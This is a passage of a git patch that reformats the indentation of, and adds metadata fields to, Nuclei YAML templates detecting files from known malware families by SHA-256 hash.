'4bd548fe07b19178281edb1ee81c9711525dab03dc0b6676963019c44cc75865'" - - "sha256(raw) == 'a14d31eb965ea8a37ebcc3b5635099f2ca08365646437c770212d534d504ff3c'" - - "sha256(raw) == '758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92'" - - "sha256(raw) == '781eb1e17349009fbae46aea5c59d8e5b68ae0b42335cb035742f6b0f4e4087e'" - - "sha256(raw) == '683f5b476f8ffe87ec22b8bab57f74da4a13ecc3a5c2cbf951999953c2064fc9'" - - "sha256(raw) == '758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92'" - - "sha256(raw) == '8ca7ed720babb32a6f381769ea00e16082a563704f8b672cb21cf11843f4da7a'" - condition: or \ No newline at end of file + - type: dsl + dsl: + - "sha256(raw) == '2b5065a3d0e0b8252a987ef5f29d9e1935c5863f5718b83440e68dc53c21fa94'" + - "sha256(raw) == 'c2c761cde3175f6e40ed934f2e82c76602c81e2128187bab61793ddb3bc686d0'" + - "sha256(raw) == 'b4005530193bc523d3e0193c3c53e2737ae3bf9f76d12c827c0b5cd0dcbaae45'" + - "sha256(raw) == '1604e36ccef5fa221b101d7f043ad7f856b84bf1a80774aa33d91c2a9a226206'" + - "sha256(raw) == '4bd548fe07b19178281edb1ee81c9711525dab03dc0b6676963019c44cc75865'" + - "sha256(raw) == 'a14d31eb965ea8a37ebcc3b5635099f2ca08365646437c770212d534d504ff3c'" + - "sha256(raw) == '758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92'" + - "sha256(raw) == '781eb1e17349009fbae46aea5c59d8e5b68ae0b42335cb035742f6b0f4e4087e'" + - "sha256(raw) == '683f5b476f8ffe87ec22b8bab57f74da4a13ecc3a5c2cbf951999953c2064fc9'" + - "sha256(raw) == '758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92'" + - "sha256(raw) == '8ca7ed720babb32a6f381769ea00e16082a563704f8b672cb21cf11843f4da7a'" + condition: or \ No newline at end of file From 413bcc4ce8a0adf838d2fe31bbc58606e25f1e2d Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 20 Jun 2024 18:46:17 +0530 Subject: [PATCH 0467/1841] minor - changes --- .../hash/anthem-deeppanda-malware-hash.yaml | 12 ++-- .../hash/blackenergy-driver-amdide-hash.yaml | 24 ++++---- .../hash/blackenergy-driver-malware-hash.yaml | 24 ++++---- .../hash/bluetermite-emdivi-malware-hash.yaml | 38 ++++++------ .../hash/bluetermite-emdivi-sfx-hash.yaml | 12 ++-- .../hash/cheshirecat-malware-hash.yaml | 16 ++--- file/malware/hash/cloudduke-malware-hash.yaml | 38 ++++++------ file/malware/hash/codoso-gh0st-malware.yaml | 16 ++--- file/malware/hash/codoso-malware-hash.yaml | 20 +++---- .../malware/hash/codoso-pgv-malware-hash.yaml | 16 ++--- .../hash/codoso-plugx-malware-hash.yaml | 16 ++--- file/malware/hash/dubnium-malware-hash.yaml | 57 +++++++++--------- .../hash/dubnium-sshopenssl-malware-hash.yaml | 21 +++---- file/malware/hash/emissary-malware-hash.yaml | 35 +++++------ file/malware/hash/fakem-malware-hash.yaml | 30 +++++----- file/malware/hash/furtim-malware-hash.yaml | 12 ++-- file/malware/hash/greenbug-malware-hash.yaml | 32 +++++----- .../hash/industroyer-malware-hash.yaml | 26 ++++----- .../hash/ironPanda-htran-malware-hash.yaml | 8 +-- .../ironpanda-dnstunclient-malware-hash.yaml | 8 +-- file/malware/hash/ironpanda-malware-hash.yaml | 16 ++--- file/malware/hash/locky-ransomware-hash.yaml | 8 +-- .../minidionis-readerview-malware-hash.yaml | 20 +++---- .../hash/minidionis-vbs-malware-hash.yaml | 8 +-- .../malware/hash/naikon-apt-malware-hash.yaml | 12 ++-- file/malware/hash/neuron2-malware-hash.yaml | 12 ++-- file/malware/hash/oilrig-malware-hash.yaml | 58 +++++++++---------- .../hash/passcv-ntscan-malware-hash.yaml | 8 +-- .../hash/passcv-sabre-malware-hash.yaml | 26 ++++----- .../hash/passcv-signingcert-malware-hash.yaml | 8 +-- file/malware/hash/petya-ransomware-hash.yaml | 8 +-- .../poseidongroup-maldoc-malware-hash.yaml | 22 +++---- .../hash/poseidongroup-malware-hash.yaml | 22 +++---- .../malware/hash/purplewave-malware-hash.yaml | 26 ++++----- .../malware/hash/red-leaves-malware-hash.yaml | 8 +-- file/malware/hash/revil-ransomware-hash.yaml | 14 ++--- file/malware/hash/rokrat-malware-hash.yaml | 8 +-- file/malware/hash/sauron-malware-hash.yaml | 22 +++---- file/malware/hash/seaduke-malware-hash.yaml | 8 +-- file/malware/hash/sfx1-malware-hash.yaml | 12 ++-- .../hash/sfxrar-acrotray-malware-hash.yaml | 14 ++--- .../hash/sofacy-Winexe-malware-hash.yaml | 8 +-- .../hash/sofacy-bundestag-malware-hash.yaml | 12 ++-- .../hash/sofacy-fybis-malware-hash.yaml | 14 ++--- file/malware/hash/tidepool-malware-hash.yaml | 16 ++--- file/malware/hash/turla-malware-hash.yaml | 28 ++++----- file/malware/hash/unit78020-malware-hash.yaml | 20 +++---- .../hash/wildneutron-malware-hash.yaml | 30 +++++----- 48 files changed, 467 insertions(+), 462 deletions(-) diff --git a/file/malware/hash/anthem-deeppanda-malware-hash.yaml b/file/malware/hash/anthem-deeppanda-malware-hash.yaml index d3ade4ee2c..8c9bf630b8 100644 --- a/file/malware/hash/anthem-deeppanda-malware-hash.yaml +++ b/file/malware/hash/anthem-deeppanda-malware-hash.yaml @@ -13,9 +13,9 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == 'ab58b6aa7dcc25d8f6e4b70a24e0ccede0d5f6129df02a9e61293c1d7d7640a2'" - - "sha256(raw) == 'c6c3bb72896f8f0b9a5351614fd94e889864cf924b40a318c79560bbbcfa372f'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == 'ab58b6aa7dcc25d8f6e4b70a24e0ccede0d5f6129df02a9e61293c1d7d7640a2'" + - "sha256(raw) == 'c6c3bb72896f8f0b9a5351614fd94e889864cf924b40a318c79560bbbcfa372f'" + condition: or diff --git a/file/malware/hash/blackenergy-driver-amdide-hash.yaml b/file/malware/hash/blackenergy-driver-amdide-hash.yaml index 0bdfde5343..dc80570888 100644 --- a/file/malware/hash/blackenergy-driver-amdide-hash.yaml +++ b/file/malware/hash/blackenergy-driver-amdide-hash.yaml @@ -1,6 +1,8 @@ id: blackenergy-driver-amdide-hash info: name: Blackenergy-Driver Amdide Hash - Detect + author: pussycat0x + severity: info description: | Detects the AMDIDE driver from BlackEnergy malware reference: @@ -11,14 +13,14 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '32d3121135a835c3347b553b70f3c4c68eef711af02c161f007a9fbaffe7e614'" - - "sha256(raw) == '3432db9cb1fb9daa2f2ac554a0a006be96040d2a7776a072a8db051d064a8be2'" - - "sha256(raw) == '90ba78b6710462c2d97815e8745679942b3b296135490f0095bdc0cd97a34d9c'" - - "sha256(raw) == '97be6b2cec90f655ef11ed9feef5b9ef057fd8db7dd11712ddb3702ed7c7bda1'" - - "sha256(raw) == '5111de45210751c8e40441f16760bf59856ba798ba99e3c9532a104752bf7bcc'" - - "sha256(raw) == 'cbc4b0aaa30b967a6e29df452c5d7c2a16577cede54d6d705ca1f095bd6d4988'" - - "sha256(raw) == '1ce0dfe1a6663756a32c69f7494ad082d293d32fe656d7908fb445283ab5fa68'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == '32d3121135a835c3347b553b70f3c4c68eef711af02c161f007a9fbaffe7e614'" + - "sha256(raw) == '3432db9cb1fb9daa2f2ac554a0a006be96040d2a7776a072a8db051d064a8be2'" + - "sha256(raw) == '90ba78b6710462c2d97815e8745679942b3b296135490f0095bdc0cd97a34d9c'" + - "sha256(raw) == '97be6b2cec90f655ef11ed9feef5b9ef057fd8db7dd11712ddb3702ed7c7bda1'" + - "sha256(raw) == '5111de45210751c8e40441f16760bf59856ba798ba99e3c9532a104752bf7bcc'" + - "sha256(raw) == 'cbc4b0aaa30b967a6e29df452c5d7c2a16577cede54d6d705ca1f095bd6d4988'" + - "sha256(raw) == '1ce0dfe1a6663756a32c69f7494ad082d293d32fe656d7908fb445283ab5fa68'" + condition: or diff --git a/file/malware/hash/blackenergy-driver-malware-hash.yaml b/file/malware/hash/blackenergy-driver-malware-hash.yaml index ba0cc65e80..716ed3a42c 100644 --- a/file/malware/hash/blackenergy-driver-malware-hash.yaml +++ b/file/malware/hash/blackenergy-driver-malware-hash.yaml @@ -12,15 +12,15 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '7874a10e551377d50264da5906dc07ec31b173dee18867f88ea556ad70d8f094'" - - "sha256(raw) == 'b73777469f939c331cbc1c9ad703f973d55851f3ad09282ab5b3546befa5b54a'" - - "sha256(raw) == 'edb16d3ccd50fc8f0f77d0875bf50a629fa38e5ba1b8eeefd54468df97eba281'" - - "sha256(raw) == 'ac13b819379855af80ea3499e7fb645f1c96a4a6709792613917df4276c583fc'" - - "sha256(raw) == '7a393b3eadfc8938cbecf84ca630e56e37d8b3d23e084a12ea5a7955642db291'" - - "sha256(raw) == '405013e66b6f137f915738e5623228f36c74e362873310c5f2634ca2fda6fbc5'" - - "sha256(raw) == '244dd8018177ea5a92c70a7be94334fa457c1aab8a1c1ea51580d7da500c3ad5'" - - "sha256(raw) == 'edcd1722fdc2c924382903b7e4580f9b77603110e497393c9947d45d311234bf'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == '7874a10e551377d50264da5906dc07ec31b173dee18867f88ea556ad70d8f094'" + - "sha256(raw) == 'b73777469f939c331cbc1c9ad703f973d55851f3ad09282ab5b3546befa5b54a'" + - "sha256(raw) == 'edb16d3ccd50fc8f0f77d0875bf50a629fa38e5ba1b8eeefd54468df97eba281'" + - "sha256(raw) == 'ac13b819379855af80ea3499e7fb645f1c96a4a6709792613917df4276c583fc'" + - "sha256(raw) == '7a393b3eadfc8938cbecf84ca630e56e37d8b3d23e084a12ea5a7955642db291'" + - "sha256(raw) == '405013e66b6f137f915738e5623228f36c74e362873310c5f2634ca2fda6fbc5'" + - "sha256(raw) == '244dd8018177ea5a92c70a7be94334fa457c1aab8a1c1ea51580d7da500c3ad5'" + - "sha256(raw) == 'edcd1722fdc2c924382903b7e4580f9b77603110e497393c9947d45d311234bf'" + condition: or diff --git a/file/malware/hash/bluetermite-emdivi-malware-hash.yaml b/file/malware/hash/bluetermite-emdivi-malware-hash.yaml index 964d0dc509..3b2faa0675 100644 --- a/file/malware/hash/bluetermite-emdivi-malware-hash.yaml +++ b/file/malware/hash/bluetermite-emdivi-malware-hash.yaml @@ -12,22 +12,22 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24'" - - "sha256(raw) == '3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1'" - - "sha256(raw) == '6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662'" - - "sha256(raw) == '90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86'" - - "sha256(raw) == '9a351885bf5f6fec466f30021088504d96e9db10309622ed198184294717add1'" - - "sha256(raw) == 'a5be7cb1f37030c9f9211c71e0fbe01dae19ff0e6560c5aab393621f18a7d012'" - - "sha256(raw) == '9183abb9b639699cd2ad28d375febe1f34c14679b7638d1a79edb49d920524a4'" - - "sha256(raw) == '008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e'" - - "sha256(raw) == 'a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d'" - - "sha256(raw) == '008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e'" - - "sha256(raw) == '17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24'" - - "sha256(raw) == '3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1'" - - "sha256(raw) == '6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662'" - - "sha256(raw) == '90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86'" - - "sha256(raw) == 'a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d'" - condition: or \ No newline at end of file + matchers: + - type: dsl + dsl: + - "sha256(raw) == '17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24'" + - "sha256(raw) == '3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1'" + - "sha256(raw) == '6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662'" + - "sha256(raw) == '90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86'" + - "sha256(raw) == '9a351885bf5f6fec466f30021088504d96e9db10309622ed198184294717add1'" + - "sha256(raw) == 'a5be7cb1f37030c9f9211c71e0fbe01dae19ff0e6560c5aab393621f18a7d012'" + - "sha256(raw) == '9183abb9b639699cd2ad28d375febe1f34c14679b7638d1a79edb49d920524a4'" + - "sha256(raw) == '008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e'" + - "sha256(raw) == 'a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d'" + - "sha256(raw) == '008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e'" + - "sha256(raw) == '17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24'" + - "sha256(raw) == '3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1'" + - "sha256(raw) == '6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662'" + - "sha256(raw) == '90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86'" + - "sha256(raw) == 'a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d'" + condition: or \ No newline at end of file diff --git a/file/malware/hash/bluetermite-emdivi-sfx-hash.yaml b/file/malware/hash/bluetermite-emdivi-sfx-hash.yaml index 22a895caa0..3f28f778d6 100644 --- a/file/malware/hash/bluetermite-emdivi-sfx-hash.yaml +++ b/file/malware/hash/bluetermite-emdivi-sfx-hash.yaml @@ -12,9 +12,9 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '7a3c81b2b3c14b9cd913692347019887b607c54152b348d6d3ccd3ecfd406196'" - - "sha256(raw) == '8c3df4e4549db3ce57fc1f7b1b2dfeedb7ba079f654861ca0b608cbfa1df0f6b'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == '7a3c81b2b3c14b9cd913692347019887b607c54152b348d6d3ccd3ecfd406196'" + - "sha256(raw) == '8c3df4e4549db3ce57fc1f7b1b2dfeedb7ba079f654861ca0b608cbfa1df0f6b'" + condition: or diff --git a/file/malware/hash/cheshirecat-malware-hash.yaml b/file/malware/hash/cheshirecat-malware-hash.yaml index f1e02e0ecc..8d519923bf 100644 --- a/file/malware/hash/cheshirecat-malware-hash.yaml +++ b/file/malware/hash/cheshirecat-malware-hash.yaml @@ -12,11 +12,11 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == 'ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300'" - - "sha256(raw) == '32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a'" - - "sha256(raw) == '63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb'" - - "sha256(raw) == 'c074aeef97ce81e8c68b7376b124546cabf40e2cd3aff1719d9daa6c3f780532'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == 'ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300'" + - "sha256(raw) == '32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a'" + - "sha256(raw) == '63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb'" + - "sha256(raw) == 'c074aeef97ce81e8c68b7376b124546cabf40e2cd3aff1719d9daa6c3f780532'" + condition: or diff --git a/file/malware/hash/cloudduke-malware-hash.yaml b/file/malware/hash/cloudduke-malware-hash.yaml index 3b155c5fbf..63cd486b98 100644 --- a/file/malware/hash/cloudduke-malware-hash.yaml +++ b/file/malware/hash/cloudduke-malware-hash.yaml @@ -12,22 +12,22 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7'" - - "sha256(raw) == '88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f'" - - "sha256(raw) == '1d4ac97d43fab1d464017abb5d57a6b4601f99eaa93b01443427ef25ae5127f7'" - - "sha256(raw) == '97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7'" - - "sha256(raw) == '1d4ac97d43fab1d464017abb5d57a6b4601f99eaa93b01443427ef25ae5127f7'" - - "sha256(raw) == '88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f'" - - "sha256(raw) == 'ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46'" - - "sha256(raw) == '97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7'" - - "sha256(raw) == 'ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46'" - - "sha256(raw) == 'ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145'" - - "sha256(raw) == 'a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004'" - - "sha256(raw) == '56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e'" - - "sha256(raw) == 'ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145'" - - "sha256(raw) == 'a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004'" - - "sha256(raw) == '56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e'" - condition: or \ No newline at end of file + matchers: + - type: dsl + dsl: + - "sha256(raw) == '97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7'" + - "sha256(raw) == '88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f'" + - "sha256(raw) == '1d4ac97d43fab1d464017abb5d57a6b4601f99eaa93b01443427ef25ae5127f7'" + - "sha256(raw) == '97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7'" + - "sha256(raw) == '1d4ac97d43fab1d464017abb5d57a6b4601f99eaa93b01443427ef25ae5127f7'" + - "sha256(raw) == '88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f'" + - "sha256(raw) == 'ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46'" + - "sha256(raw) == '97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7'" + - "sha256(raw) == 'ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46'" + - "sha256(raw) == 'ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145'" + - "sha256(raw) == 'a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004'" + - "sha256(raw) == '56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e'" + - "sha256(raw) == 'ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145'" + - "sha256(raw) == 'a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004'" + - "sha256(raw) == '56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e'" + condition: or \ No newline at end of file diff --git a/file/malware/hash/codoso-gh0st-malware.yaml b/file/malware/hash/codoso-gh0st-malware.yaml index 39268274b4..161737bc43 100644 --- a/file/malware/hash/codoso-gh0st-malware.yaml +++ b/file/malware/hash/codoso-gh0st-malware.yaml @@ -12,11 +12,11 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == 'bf52ca4d4077ae7e840cf6cd11fdec0bb5be890ddd5687af5cfa581c8c015fcd'" - - "sha256(raw) == '5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841'" - - "sha256(raw) == '7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8'" - - "sha256(raw) == 'd7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == 'bf52ca4d4077ae7e840cf6cd11fdec0bb5be890ddd5687af5cfa581c8c015fcd'" + - "sha256(raw) == '5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841'" + - "sha256(raw) == '7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8'" + - "sha256(raw) == 'd7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297'" + condition: or diff --git a/file/malware/hash/codoso-malware-hash.yaml b/file/malware/hash/codoso-malware-hash.yaml index 53e46b086d..c3def1f955 100644 --- a/file/malware/hash/codoso-malware-hash.yaml +++ b/file/malware/hash/codoso-malware-hash.yaml @@ -14,13 +14,13 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == 'ea67d76e9d2e9ce3a8e5f80ff9be8f17b2cd5b1212153fdf36833497d9c060c0'" - - "sha256(raw) == '130abb54112dd47284fdb169ff276f61f2b69d80ac0a9eac52200506f147b5f8'" - - "sha256(raw) == '3ea6b2b51050fe7c07e2cf9fa232de6a602aa5eff66a2e997b25785f7cf50daa'" - - "sha256(raw) == '02cf5c244aebaca6195f45029c1e37b22495609be7bdfcfcd79b0c91eac44a13'" - - "sha256(raw) == 'd66106ec2e743dae1d71b60a602ca713b93077f56a47045f4fc9143aa3957090'" - - "sha256(raw) == '3577845d71ae995762d4a8f43b21ada49d809f95c127b770aff00ae0b64264a3'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == 'ea67d76e9d2e9ce3a8e5f80ff9be8f17b2cd5b1212153fdf36833497d9c060c0'" + - "sha256(raw) == '130abb54112dd47284fdb169ff276f61f2b69d80ac0a9eac52200506f147b5f8'" + - "sha256(raw) == '3ea6b2b51050fe7c07e2cf9fa232de6a602aa5eff66a2e997b25785f7cf50daa'" + - "sha256(raw) == '02cf5c244aebaca6195f45029c1e37b22495609be7bdfcfcd79b0c91eac44a13'" + - "sha256(raw) == 'd66106ec2e743dae1d71b60a602ca713b93077f56a47045f4fc9143aa3957090'" + - "sha256(raw) == '3577845d71ae995762d4a8f43b21ada49d809f95c127b770aff00ae0b64264a3'" + condition: or diff --git a/file/malware/hash/codoso-pgv-malware-hash.yaml b/file/malware/hash/codoso-pgv-malware-hash.yaml index f346a94739..59c7269679 100644 --- a/file/malware/hash/codoso-pgv-malware-hash.yaml +++ b/file/malware/hash/codoso-pgv-malware-hash.yaml @@ -14,11 +14,11 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '4b16f6e8414d4192d0286b273b254fa1bd633f5d3d07ceebd03dfdfc32d0f17f'" - - "sha256(raw) == '13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75'" - - "sha256(raw) == 'bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe'" - - "sha256(raw) == '4b16f6e8414d4192d0286b273b254fa1bd633f5d3d07ceebd03dfdfc32d0f17f'" - condition: or \ No newline at end of file + matchers: + - type: dsl + dsl: + - "sha256(raw) == '4b16f6e8414d4192d0286b273b254fa1bd633f5d3d07ceebd03dfdfc32d0f17f'" + - "sha256(raw) == '13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75'" + - "sha256(raw) == 'bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe'" + - "sha256(raw) == '4b16f6e8414d4192d0286b273b254fa1bd633f5d3d07ceebd03dfdfc32d0f17f'" + condition: or \ No newline at end of file diff --git a/file/malware/hash/codoso-plugx-malware-hash.yaml b/file/malware/hash/codoso-plugx-malware-hash.yaml index 272333b851..4eb060ec8b 100644 --- a/file/malware/hash/codoso-plugx-malware-hash.yaml +++ b/file/malware/hash/codoso-plugx-malware-hash.yaml @@ -14,11 +14,11 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3'" - - "sha256(raw) == 'b9510e4484fa7e3034228337768176fce822162ad819539c6ca3631deac043eb'" - - "sha256(raw) == '74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3'" - - "sha256(raw) == '74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == '74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3'" + - "sha256(raw) == 'b9510e4484fa7e3034228337768176fce822162ad819539c6ca3631deac043eb'" + - "sha256(raw) == '74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3'" + - "sha256(raw) == '74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3'" + condition: or diff --git a/file/malware/hash/dubnium-malware-hash.yaml b/file/malware/hash/dubnium-malware-hash.yaml index 5d8aa8e443..716cea49e8 100644 --- a/file/malware/hash/dubnium-malware-hash.yaml +++ b/file/malware/hash/dubnium-malware-hash.yaml @@ -2,6 +2,7 @@ id: dubnium-malware-hash info: name: Dubnium Malware Hash - Detect author: pussycat0x + severity: info description: | Detects sample mentioned in the Dubnium Report reference: @@ -13,31 +14,31 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b'" - - "sha256(raw) == 'caefcdf2b4e5a928cdf9360b70960337f751ec4a5ab8c0b75851fc9a1ab507a8'" - - "sha256(raw) == 'e0362d319a8d0e13eda782a0d8da960dd96043e6cc3500faeae521d1747576e5'" - - "sha256(raw) == 'a77d1c452291a6f2f6ed89a4bac88dd03d38acde709b0061efd9f50e6d9f3827'" - - "sha256(raw) == '16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b'" - - "sha256(raw) == '1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8'" - - "sha256(raw) == '41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf'" - - "sha256(raw) == '5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b'" - - "sha256(raw) == '5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0'" - - "sha256(raw) == '839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba'" - - "sha256(raw) == 'a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9'" - - "sha256(raw) == 'bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f'" - - "sha256(raw) == 'e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b'" - - "sha256(raw) == '5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b'" - - "sha256(raw) == '5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0'" - - "sha256(raw) == '839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba'" - - "sha256(raw) == '16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b'" - - "sha256(raw) == '1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8'" - - "sha256(raw) == '41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf'" - - "sha256(raw) == '5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b'" - - "sha256(raw) == '5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0'" - - "sha256(raw) == 'a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9'" - - "sha256(raw) == 'bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f'" - - "sha256(raw) == 'e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == '5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b'" + - "sha256(raw) == 'caefcdf2b4e5a928cdf9360b70960337f751ec4a5ab8c0b75851fc9a1ab507a8'" + - "sha256(raw) == 'e0362d319a8d0e13eda782a0d8da960dd96043e6cc3500faeae521d1747576e5'" + - "sha256(raw) == 